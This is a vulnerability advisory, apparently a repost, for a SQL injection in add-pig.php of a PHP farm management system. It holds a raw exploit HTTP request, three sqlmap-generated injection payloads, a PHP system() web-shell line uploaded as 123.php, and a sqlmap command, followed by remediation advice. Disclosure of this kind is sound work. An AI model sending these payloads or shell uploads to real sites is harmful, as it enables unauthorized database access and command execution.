CVE-2025-0561

Itsourcecode Farm Management System In PHP v1.0 add-pig.php SQL injection

AFFECTED AND/OR FIXED VERSION(S)

submitter

• weiwei-abc
  

Vulnerable File

• add-pig.php
  

VERSION(S)

• V1.0
  

PROBLEM TYPE

Vulnerability Type

• SQL injection
  

Root Cause

• A SQL injection vulnerability was found in the ‘add-pig.php’ file of the ‘Farm Management System In PHP’ project. The reason for this issue is that attackers inject malicious code from the parameter “pigno” and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
  

Impact

• Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
  

DESCRIPTION

• Due to insufficient user input verification for the “pigno” parameter, a serious SQL injection vulnerability has been discovered in the login function of the “Farm Management System In PHP”, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
  

Vulnerability details and POC

1. POST /add-pig.php HTTP/1.1
2. Host: 192.168.1.136:1219
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6. Accept-Encoding: gzip, deflate, br
7. Content-Type: multipart/form-data; boundary=---------------------------359458591942496535511331165261
8. Content-Length: 1199
9. Origin: http://192.168.1.136:1219
10. Connection: close
11. Referer: http://192.168.1.136:1219/add-pig.php
12. Cookie: pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%227LWOmQxn1kFNKDQIKEqUQQ%3D%3D%22%2C%22mac%22%3A%22f46715269295f7bc9c1753cf49cb29de885e0738%22%2C%22payload%22%3A%22uwlGMpERga3ktRQQmcLQUg%3D%3D%22%7D; PHPSESSID=4j8anjs7rlcs27867bnlmj1116; phpMyAdmin=5r1opuf2mqc9j30vli7mfrhvtt; pmaAuth-1=%7B%22iv%22%3A%22HbgyCK8mDtH6Yh3l1rTCWw%3D%3D%22%2C%22mac%22%3A%226259e5b1095aeff224b50540aea65c624fb900c9%22%2C%22payload%22%3A%22SiwuQJzR6qfxiA6velzoYRz%2BXnITRHrg37ZL9M1sbb0%3D%22%7D
13. Upgrade-Insecure-Requests: 1
14. Priority: u=1
16. -----------------------------359458591942496535511331165261
17. Content-Disposition: form-data; name="pigno"
19. pig-fms-5320
20. -----------------------------359458591942496535511331165261
21. Content-Disposition: form-data; name="weight"
23. 123
24. -----------------------------359458591942496535511331165261
25. Content-Disposition: form-data; name="arrived"
27. 2024-06-01
28. -----------------------------359458591942496535511331165261
29. Content-Disposition: form-data; name="gender"
31. male
32. -----------------------------359458591942496535511331165261
33. Content-Disposition: form-data; name="status"
35. active
36. -----------------------------359458591942496535511331165261
37. Content-Disposition: form-data; name="breed"
39. 1
40. -----------------------------359458591942496535511331165261
41. Content-Disposition: form-data; name="remark"
43. 123
44. -----------------------------359458591942496535511331165261
45. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
46. Content-Type: application/octet-stream
48. -----------------------------359458591942496535511331165261
49. Content-Disposition: form-data; name="submit"
52. -----------------------------359458591942496535511331165261--

复制代码

Vulnerability type:

• time-based blind
  
• boolean-based blind
  
• error-based
  
• stacked queries
  

Vulnerability location:

• ‘pigno’ parameter
  

Payload:

1. Parameter: MULTIPART pigno ((custom) POST)
2.     Type: boolean-based blind
3.     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
4.     Payload: -----------------------------359458591942496535511331165261
5. Content-Disposition: form-data; name="pigno"
7. pig-fms-5320' RLIKE (SELECT (CASE WHEN (5474=5474) THEN 0x7069672d666d732d35333230 ELSE 0x28 END)) AND 'YqbQ'='YqbQ
8. -----------------------------359458591942496535511331165261
9. Content-Disposition: form-data; name="weight"
11. 123
12. -----------------------------359458591942496535511331165261
13. Content-Disposition: form-data; name="arrived"
15. 2024-06-01
16. -----------------------------359458591942496535511331165261
17. Content-Disposition: form-data; name="gender"
19. male
20. -----------------------------359458591942496535511331165261
21. Content-Disposition: form-data; name="status"
23. active
24. -----------------------------359458591942496535511331165261
25. Content-Disposition: form-data; name="breed"
27. 1
28. -----------------------------359458591942496535511331165261
29. Content-Disposition: form-data; name="remark"
31. 123
32. -----------------------------359458591942496535511331165261
33. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
34. Content-Type: application/octet-stream
36. <?php system("ipconfig"); ?>
37. -----------------------------359458591942496535511331165261
38. Content-Disposition: form-data; name="submit"
41. -----------------------------359458591942496535511331165261--
43.     Type: error-based
44.     Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
45.     Payload: -----------------------------359458591942496535511331165261
46. Content-Disposition: form-data; name="pigno"
48. pig-fms-5320' AND EXTRACTVALUE(4487,CONCAT(0x5c,0x7178767871,(SELECT (ELT(4487=4487,1))),0x71786a7a71)) AND 'nUep'='nUep
49. -----------------------------359458591942496535511331165261
50. Content-Disposition: form-data; name="weight"
52. 123
53. -----------------------------359458591942496535511331165261
54. Content-Disposition: form-data; name="arrived"
56. 2024-06-01
57. -----------------------------359458591942496535511331165261
58. Content-Disposition: form-data; name="gender"
60. male
61. -----------------------------359458591942496535511331165261
62. Content-Disposition: form-data; name="status"
64. active
65. -----------------------------359458591942496535511331165261
66. Content-Disposition: form-data; name="breed"
68. 1
69. -----------------------------359458591942496535511331165261
70. Content-Disposition: form-data; name="remark"
72. 123
73. -----------------------------359458591942496535511331165261
74. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
75. Content-Type: application/octet-stream
77. <?php system("ipconfig"); ?>
78. -----------------------------359458591942496535511331165261
79. Content-Disposition: form-data; name="submit"
82. -----------------------------359458591942496535511331165261--
84.     Type: time-based blind
85.     Title: MySQL >= 5.0.12 RLIKE time-based blind
86.     Payload: -----------------------------359458591942496535511331165261
87. Content-Disposition: form-data; name="pigno"
89. pig-fms-5320' RLIKE SLEEP(5) AND 'bQdJ'='bQdJ
90. -----------------------------359458591942496535511331165261
91. Content-Disposition: form-data; name="weight"
93. 123
94. -----------------------------359458591942496535511331165261
95. Content-Disposition: form-data; name="arrived"
97. 2024-06-01
98. -----------------------------359458591942496535511331165261
99. Content-Disposition: form-data; name="gender"
101. male
102. -----------------------------359458591942496535511331165261
103. Content-Disposition: form-data; name="status"
105. active
106. -----------------------------359458591942496535511331165261
107. Content-Disposition: form-data; name="breed"
109. 1
110. -----------------------------359458591942496535511331165261
111. Content-Disposition: form-data; name="remark"
113. 123
114. -----------------------------359458591942496535511331165261
115. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
116. Content-Type: application/octet-stream
119. -----------------------------359458591942496535511331165261
120. Content-Disposition: form-data; name="submit"
123. -----------------------------359458591942496535511331165261--

复制代码

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

1. sqlmap -r 123 --batch --dbs  

复制代码

Suggested repair

• Use prepared statements and parameter binding:
  Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
  
• Input validation and filtering:
  Strictly validate and filter user input data to ensure it conforms to the expected format.
  
• Minimize database user permissions:
  Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as’ root ‘or’ admin ') for daily operations.
  
• Regular security audits:
  Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。